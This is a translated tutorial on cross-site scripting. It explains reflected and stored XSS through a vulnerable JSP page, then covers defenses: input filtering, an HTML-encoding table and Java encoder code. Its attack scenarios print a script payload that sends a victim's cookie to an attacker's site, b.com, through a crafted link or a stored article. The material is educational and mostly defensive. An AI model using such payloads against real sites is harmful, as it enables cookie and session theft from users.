XSS attacks and defenses

Tags: html encode, sql injection attack

This article is from Gao | Coder; the original address is http://blog.csdn.net/ghsau/article/details/17027893. Please cite the source when reprinting.
XSS, also known as CSS, full name Cross Site Script (cross-site scripting attack), is a common vulnerability in web programs. XSS is passive and is used to attack the client, so its harmfulness is easily overlooked. The principle is that an attacker enters (passes in) malicious HTML code into a site that has an XSS vulnerability; when other users browse the site, that HTML code runs automatically in their browser and achieves the attacker's purpose, for example stealing the user's cookies, destroying the page structure, redirecting to another site, and so on.

XSS attack

An XSS attack is similar to a SQL injection attack: we first find an XSS vulnerability in the site. XSS vulnerabilities come in two kinds, DOM Based XSS vulnerabilities and stored XSS vulnerabilities. In theory, wherever input data is echoed back without being processed there is an XSS vulnerability; how much harm it does depends on the power of the attack code, and the attack code is not limited to script.

DOM Based XSS

DOM Based XSS is an attack built on the structure of the web page's DOM. Its characteristic is that only a small number of people fall for it.

Scenario One:

When I log in to a.com, I find that some of its content is displayed directly from a URL parameter called content, and the page's handling is probably similar to the following (other languages are alike):

    <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <title>XSS test</title>
    </head>
    <body>
    <%-- The parameter is written into the page unencoded: this is the vulnerable line --%>
    Page content: <%=request.getParameter("content")%>
    </body>
    </html>

I got it. If I open http://www.a.com?content=<script>alert("XSS")</script> in my own browser, the browser runs my script while it renders the page, and the page pops up the word XSS. But that only attacks myself; how do I attack others and profit from it? Tom is also registered on the site, and I know his mailbox (or some other way to send him information). I make a hyperlink for him whose address is http://www.a.com?content=<script>window.open("www.b.com?param="+document.cookie)</script>. When Tom clicks the link (if he is already signed in to a.com), his browser opens b.com directly and sends Tom's a.com cookie to b.com. b.com is a site I set up; when my site receives this request, I have stolen Tom's a.com cookie, which may contain his password. Attack success! In this process the only victim is Tom himself.

Stored XSS

Stored XSS is a stored XSS vulnerability: because its attack code is stored on the server or in the database, the victims are very many.

Scenario Two:

a.com lets users publish articles. I log in to a.com and publish an article that contains the malicious code <script>window.open("www.b.com?param="+document.cookie)</script>, and save the article. Then Tom and Jack see my published article; everyone who views it is hit, and their cookie information is sent to my server. Attack success! In this process there is more than one victim.

A stored XSS vulnerability is more harmful, and the scope of the harm is much wider.

XSS Defense

We live in a contradictory world: where there are spears, there are shields. To keep our code free of holes so that attackers have nothing to exploit, we have to make it an egg without a seam. XSS can be defended in the following ways.

A complete filtering mechanism

Never trust the user's input. User input must be processed: only agree to accept values that are valid, and filter all other values out.

HTML encode

If in some cases we cannot strictly filter the user's data, we also need to convert the markup characters:

    Less-than character (<)                                   &lt;
    Greater-than character (>)                                &gt;
    Ampersand character (&)                                   &amp;
    Double-quote character (")                                &quot;
    Space character ( )                                       &nbsp;
    Any character whose code is greater than or equal to 0x80 &#<number>;, where <number> is the character's numeric code value

For example, if the user enters <script>window.location.href="http://www.baidu.com";</script>, then after encoding what gets stored is &lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;;&lt;/script&gt;. When the page is rendered, the browser turns these characters into text content rather than into a piece of code that can run.

The following two methods are available for doing the HTML encode:
  • Use Apache's commons-lang.jar

      StringEscapeUtils.escapeHtml(str); // Chinese characters are converted to the corresponding numeric character reference; spaces are not converted

  • Implement the conversion yourself, converting just the few characters that matter:

    /** Encode a single character according to the table above; other characters pass through unchanged */
    private static String htmlEncode(char c) {
        switch (c) {
        case '&':
            return "&amp;";
        case '<':
            return "&lt;";
        case '>':
            return "&gt;";
        case '"':
            return "&quot;";
        case ' ':
            return "&nbsp;";
        default:
            return c + "";
        }
    }

    /** Apply HTML encode conversion to the passed-in string str */
    public static String htmlEncode(String str) {
        if (str == null || str.trim().equals("")) return str;
        StringBuilder encodeStrBuilder = new StringBuilder();
        for (int i = 0, len = str.length(); i < len; i++) {
            encodeStrBuilder.append(htmlEncode(str.charAt(i)));
        }
        return encodeStrBuilder.toString();
    }
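The following is an added example, not code from the original article, showing how the two defenses above (filtering on input, HTML encoding on output) fit together for the content parameter of the page in Scenario One. The class name, the allow-list pattern, and the methods isValidContent, htmlEncode and renderContent are my own assumptions; the encoder keeps the article's mapping for &, <, > and " but additionally encodes the single quote and leaves spaces alone.

```java
import java.util.regex.Pattern;

/**
 * Added example (not the article's code): defense in depth for the "content"
 * request parameter. Step 1 rejects anything not on an allow-list; step 2
 * HTML-encodes whatever is echoed into the page, so a value that slips past
 * step 1 still cannot become markup.
 */
public class XssDefenseExample {

    // Assumed allow-list: letters, digits, spaces and a little punctuation, at most 200 chars.
    // What counts as "valid" is application-specific; this pattern is an assumption.
    private static final Pattern ALLOWED_CONTENT =
            Pattern.compile("^[\\p{L}\\p{N} .,!?\\-]{0,200}$");

    /** Step 1: allow-list validation. Only values we agree to accept return true. */
    public static boolean isValidContent(String content) {
        return content != null && ALLOWED_CONTENT.matcher(content).matches();
    }

    /** Step 2: encoding for HTML body context and quoted attribute values. */
    public static String htmlEncode(String str) {
        if (str == null) return "";
        StringBuilder sb = new StringBuilder(str.length() + 16);
        for (int i = 0; i < str.length(); i++) {
            char c = str.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break; // so the value is also safe in single-quoted attributes
                default:
                    if (c >= 0x80) {
                        sb.append("&#").append((int) c).append(';'); // numeric reference for non-ASCII
                    } else {
                        sb.append(c);
                    }
            }
        }
        return sb.toString();
    }

    /** The text the JSP would emit in place of <%=request.getParameter("content")%>. */
    public static String renderContent(String content) {
        if (!isValidContent(content)) {
            // Rejected input is never echoed back; a fixed message takes its place.
            return "Page content: [invalid content]";
        }
        return "Page content: " + htmlEncode(content);
    }

    public static void main(String[] args) {
        // Constructed inputs: a harmless value and the payload quoted in the article.
        String benign = "Hello, Tom!";
        String payload = "<script>window.open(\"www.b.com?param=\"+document.cookie)</script>";

        System.out.println(renderContent(benign));
        System.out.println(renderContent(payload));

        // Even with validation skipped, the encoded output carries no markup characters.
        String encoded = htmlEncode(payload);
        System.out.println(encoded);
        System.out.println("encoded output still contains '<': " + encoded.contains("<"));
    }
}
```

In the JSP itself the output step can equally be JSTL's <c:out value="${param.content}"/>, which escapes <, >, &, ' and " by default. Note that this kind of encoding is only correct when the value lands in HTML body text or a quoted attribute value; a value written inside a <script> block or into a URL attribute needs the encoding appropriate to that context.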
